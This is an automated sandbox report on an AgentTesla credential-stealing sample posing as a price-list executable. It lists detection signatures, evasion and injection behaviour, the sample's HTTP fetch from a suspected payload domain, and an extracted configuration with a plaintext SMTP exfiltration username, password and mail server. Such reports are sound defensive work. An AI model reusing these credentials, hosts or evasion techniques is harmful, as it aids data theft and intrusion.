Analysis Report PRICE LIST (NOVEMBER 2020).exe

Overview

General Information

Sample Name: PRICE LIST (NOVEMBER 2020).exe
Analysis ID: 356549
MD5: 404ef05a6acc67c2b59189171f9eb0fc
SHA1: 0ecf315e5a72a3c9ddd386d1116d2265877b4027
SHA256: 863d464bb43bda7378c611a5c16410a3c279ca72e447632f5e03f8418f5464d8
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Startup

  • System is w10x64
  • PRICE LIST (NOVEMBER 2020).exe (PID: 7024 cmdline: 'C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe' MD5: 404EF05A6ACC67C2B59189171F9EB0FC)
    • cmd.exe (PID: 5932 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 4852 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 6704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1592 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "uZpecWaWaVj1vP", "URL: ": "http://L2JzF7P98hlnK.net", "To: ": "jose.carvalho@electrobelarmino.pt", "ByHost: ": "mail.electrobelarmino.pt:587", "Password: ": "drqmyQWtkw41E", "From: ": "jose.carvalho@electrobelarmino.pt"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.407424044.0000000006835000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 1508 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
8.2.PRICE LIST (NOVEMBER 2020).exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: PRICE LIST (NOVEMBER 2020).exe.1508.8.memstr, Malware Configuration Extractor: Agenttesla {"Username: ": "uZpecWaWaVj1vP", "URL: ": "http://L2JzF7P98hlnK.net", "To: ": "jose.carvalho@electrobelarmino.pt", "ByHost: ": "mail.electrobelarmino.pt:587", "Password: ": "drqmyQWtkw41E", "From: ": "jose.carvalho@electrobelarmino.pt"}
Multi AV Scanner detection for submitted file
Source: PRICE LIST (NOVEMBER 2020).exe, ReversingLabs: Detection: 25%
Machine Learning detection for sample
Source: PRICE LIST (NOVEMBER 2020).exe, Joe Sandbox ML: detected
Source: 8.2.PRICE LIST (NOVEMBER 2020).exe.400000.0.unpack, Avira: Label: TR/Spy.Gen8

Compliance:

Uses 32bit PE files
Source: PRICE LIST (NOVEMBER 2020).exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: PRICE LIST (NOVEMBER 2020).exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://L2JzF7P98hlnK.net
Source: global traffic, HTTP traffic detected: GET /base/FBD1AA88F2DB3E5E79F7212492E97FE4.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 104.21.71.230
Source: unknown, DNS traffic detected: queries for: coroloboxorozor.com
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: http://CMvIqY.com
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.605811150.0000000002E2D000.00000004.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606314503.0000000002EA5000.00000004.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: http://L2JzF7P98hlnK.net
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.381179952.0000000002871000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.381179952.0000000002871000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/FBD1AA88F2DB3E5E79F7212492E97FE4.html
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://mail.electrobelarmino.pt
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://ocsp.digicert.com0C
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://ocsp.digicert.com0O
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/05
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
Source: PRICE LIST (NOVEMBER 2020).exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%$
Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: PRICE LIST (NOVEMBER 2020).exe | String found in binary or memory: https://www.digicert.com/CPS0
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380542993.0000000000BCB000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 0_2_027DA0D0 NtSetInformationThread,0_2_027DA0D0
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 0_2_027DAE21 NtSetInformationThread,0_2_027DAE21
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 0_2_027D0690 0_2_027D0690
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 0_2_027D2AD8 0_2_027D2AD8
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 0_2_027D1BE9 0_2_027D1BE9
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 0_2_027D5BE1 0_2_027D5BE1
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 0_2_027D6E48 0_2_027D6E48
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 0_2_027DCDD8 0_2_027DCDD8
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 8_2_00E46ACD 8_2_00E46ACD
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 8_2_00E45B50 8_2_00E45B50
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 8_2_00F846A0 8_2_00F846A0
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 8_2_00F845B0 8_2_00F845B0
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Code function: 8_2_00F8D281 8_2_00F8D281
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1592
Source: PRICE LIST (NOVEMBER 2020).exe | Static PE information: invalid certificate
Source: PRICE LIST (NOVEMBER 2020).exe | Binary or memory string: OriginalFilename vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380026747.00000000004E2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameVHQefUyV.exe2 vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.383382280.0000000002E38000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamePpFY VOt.exe2 vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380837285.0000000000E30000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380542993.0000000000BCB000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.408068752.00000000069D0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.407827121.00000000068E0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.391196809.0000000005730000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.391196809.0000000005730000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.390833495.0000000004DF0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.603002518.0000000000EA0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx.mui vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.603514060.0000000000FAA000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.601471388.0000000000842000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameVHQefUyV.exe2 vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.610163268.0000000006030000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.602969148.0000000000E90000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamePpFY VOt.exe2 vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.609887312.0000000005C60000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe | Binary or memory string: OriginalFilenameVHQefUyV.exe2 vs PRICE LIST (NOVEMBER 2020).exe
Source: PRICE LIST (NOVEMBER 2020).exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbi18
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/4@2/1
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7024
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB99A.tmp
Source: PRICE LIST (NOVEMBER 2020).exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: PRICE LIST (NOVEMBER 2020).exe | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | File read: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
Source: unknown | Process created: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe 'C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown | Process created: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1592
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Process created: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: PRICE LIST (NOVEMBER 2020).exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PRICE LIST (NOVEMBER 2020).exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb2 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdblo source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: rasman.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380581139.0000000000BFE000.00000004.00000020.sdmp
                  Source: Binary string: cfgmgr32.pdbT source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: .pdb88 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380203854.00000000008F7000.00000004.00000010.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb* source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbi18 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: wUxTheme.pdb+ source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.391966580.0000000004F62000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb^ source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: edputil.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp

                  Data Obfuscation:

                  Binary contains a suspicious time stamp
                  Source: initial sample, Static PE information: 0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Code function: 0_2_068D24EA pushfd ; ret 0_2_068D24ED
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Code function: 0_2_068D327A push eax; retf 0_2_068D327D
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Code function: 8_2_00E4B597 push edi; retn 0000h 8_2_00E4B599
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Code function: 8_2_00F88B75 pushad ; ret 8_2_00F88B83
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Code function: 8_2_00F8D9E4 push cs; ret 8_2_00F8D9E5
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Code function: 8_2_00F8D9D4 push cs; ret 8_2_00F8D9D5
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Code function: 8_2_00F8D9C4 push cs; ret 8_2_00F8D9C5
                  Source: initial sample, Static PE information: section name: .text entropy: 6.84633802835
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Window / User API: threadDelayed 385
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Window / User API: threadDelayed 2952
